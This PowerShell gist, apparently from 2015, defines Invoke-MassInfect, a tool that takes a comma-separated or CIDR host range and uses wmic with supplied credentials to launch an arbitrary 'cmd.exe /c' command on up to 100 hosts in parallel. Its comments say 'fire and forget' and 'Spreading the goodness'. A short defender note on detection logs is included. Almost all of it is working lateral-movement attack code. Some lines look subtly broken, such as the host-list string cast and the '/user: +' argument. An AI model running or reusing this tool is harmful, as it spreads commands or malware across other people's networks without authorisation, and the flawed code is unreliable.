@rvrsh3ll
Created July 23, 2015 15:51
function Invoke-MassInfect
{
<#
.SYNOPSIS
Runs one command on every host in a comma-separated list or CIDR range via WMIC,
using a runspace pool so the hosts are handled in parallel.

Inspired by Chris Campbell's WMIS command encoder
https://github.com/obscuresec/random/blob/master/EncodeShell.py
CIDR Parser from Matt Graeber's Invoke-PortScan
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
.DESCRIPTION
Send commands across a network range quickly with WMIC.
The host specification is first expanded into a plain address list (a CIDR
block is enumerated from its network base address upward, 2^(32-mask) entries,
so the network and broadcast addresses are included). A nested ForEach-Parallel
helper then invokes "wmic /node:<host> ... process call create cmd.exe /c <Cmd>"
for each entry with up to 100 concurrent runspaces.
.PARAMETER Rhosts
Comma-Separated or CIDR Hosts to infect.
.PARAMETER User
Username handed to wmic's /user: switch for authenticating to each host.
.PARAMETER Password
Password handed to wmic's /password: switch. It is placed on the wmic.exe
command line of the machine running this function, so it is visible in
process-creation telemetry there.
.PARAMETER Cmd
Command line executed on each host through "cmd.exe /c".
.EXAMPLE
Replace username and password with credentials. Add your command, fire and forget.
.NOTES
Defender view: each target receives a remote WMI Win32_Process.Create request
that starts cmd.exe (typically with WmiPrvSE.exe as the parent process); the
source host launches wmic.exe once per target with /node:, /user: and /password:
on the command line. Process-creation logging that records command lines
(Windows 4688 with command-line auditing enabled, or Sysmon Event ID 1) captures
both sides of this activity.
#>
[CmdletBinding()]
Param (
[Parameter(
ValueFromPipeline=$True,
Mandatory=$True)]
[String]$Rhosts,
[Parameter(
ValueFromPipeline=$True,
Mandatory=$True)]
[String]$User,
[Parameter(
ValueFromPipeline=$True,
Mandatory=$True)]
[String]$Password,
[Parameter(
ValueFromPipeline=$True,
Mandatory=$True)]
[String]$Cmd
)
PROCESS {
Set-StrictMode -Version 2.0
# Flat list of target addresses as strings; filled in by the expansion below.
$hostList = New-Object System.Collections.ArrayList
# Split the comma-separated target specification.
[String] $iHosts = $Rhosts.Split(",")
foreach($iHost in $iHosts)
{
# Strip embedded spaces and skip empty entries.
$iHost = $iHost.Replace(" ", "")
if(!$iHost)
{
continue
}
if($iHost.contains("/"))
{
# CIDR entry: "<network>/<prefix length>".
$netPart = $iHost.split("/")[0]
[uint32]$maskPart = $iHost.split("/")[1]
$address = [System.Net.IPAddress]::Parse($netPart)
# A prefix length equal to or beyond the address width is rejected.
if ($maskPart -ge $address.GetAddressBytes().Length * 8)
{
throw "Bad host mask"
}
# Total number of addresses in the block: 2^(bits - prefix).
$numhosts = [System.math]::Pow(2,(($address.GetAddressBytes().Length *8) - $maskPart))
# Convert the address bytes (network order) into a host-order uint32 so the
# mask can be applied arithmetically.
$startaddress = $address.GetAddressBytes()
[array]::Reverse($startaddress)
$startaddress = [System.BitConverter]::ToUInt32($startaddress, 0)
# Build the netmask from the prefix length (top $maskPart bits set) and
# clear the host bits to get the network base address.
[uint32]$startMask = ([System.math]::Pow(2, $maskPart)-1) * ([System.Math]::Pow(2,(32 - $maskPart)))
$startAddress = $startAddress -band $startMask
#in powershell 2.0 there are 4 0 bytes padded, so the [0..3] is necessary
$startAddress = [System.BitConverter]::GetBytes($startaddress)[0..3]
[array]::Reverse($startaddress)
$address = [System.Net.IPAddress] [byte[]] $startAddress
$hostList.Add($address.IPAddressToString)
# Walk the remaining $numhosts-1 addresses by incrementing the uint32 form
# and converting back to dotted notation each time.
for ($i=0; $i -lt $numhosts-1; $i++)
{
$nextAddress = $address.GetAddressBytes()
[array]::Reverse($nextAddress)
$nextAddress = [System.BitConverter]::ToUInt32($nextAddress, 0)
$nextAddress ++
$nextAddress = [System.BitConverter]::GetBytes($nextAddress)[0..3]
[array]::Reverse($nextAddress)
$address = [System.Net.IPAddress] [byte[]] $nextAddress
$hostList.Add($address.IPAddressToString)
}
}
else
{
# Plain host name or address: added as given.
$hostList.Add($iHost)
}
}
# Loop through targets and invoke our remote command
# First, we'll setup some threading as seen @ http://pwndizzle.blogspot.com/2013/12/powershell-threading.html
# ForEach-Parallel: runs $ScriptBlock once per pipeline object, each in its own
# PowerShell instance drawn from a runspace pool of at most $MaxThreads. The
# script block is rewritten with a leading "param($_)" so the current pipeline
# object is available as $_ inside the runspace.
function ForEach-Parallel {
[CmdletBinding()]Param (
[Parameter(Mandatory=$true,position=0)]
[System.Management.Automation.ScriptBlock] $ScriptBlock,
[Parameter(Mandatory=$true,ValueFromPipeline=$true)]
[PSObject]$InputObject,
[Parameter(Mandatory=$false)]
[int]$MaxThreads=5
)
BEGIN {
# Pool is created with a default session state; $host is passed so the
# runspaces share the current host for output.
$iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault()
$pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host)
$pool.open()
$threads = @()
$ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString())
}
PROCESS {
# One PowerShell instance per input object; started asynchronously and
# tracked so END can collect it.
$powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject)
$powershell.runspacepool=$pool
$threads+= @{
instance = $powershell
handle = $powershell.begininvoke()
}
}
END {
# Busy-poll until every tracked instance reports IsCompleted, then finish
# and dispose each one. Completed entries are nulled out so they are not
# polled again.
$notdone = $true
while ($notdone) {
$notdone = $false
for ($i=0; $i -lt $threads.count; $i++) {
$thread = $threads[$i]
if ($thread) {
if ($thread.handle.iscompleted) {
$thread.instance.endinvoke($thread.handle)
$thread.instance.dispose()
$threads[$i] = $null
}
else {
$notdone = $true
}
}
}
}
}
}
# Any error from here on terminates the run rather than continuing.
$ErrorActionPreference = "Stop";
Write-Verbose "Spreading the goodness.."
# Fan the host list out over up to 100 runspaces. Each runspace launches
# wmic.exe against one host; the remote side is a WMI Win32_Process.Create
# that starts "cmd.exe /c <Cmd>". The /user: and /password: values are passed
# on the wmic command line.
$hostList | % { $_ } |ForEach-Parallel -MaxThreads 100 {
wmic /node:$_ /user: + $User /password: + $Password process call create "cmd.exe /c $cmd"
}
}
}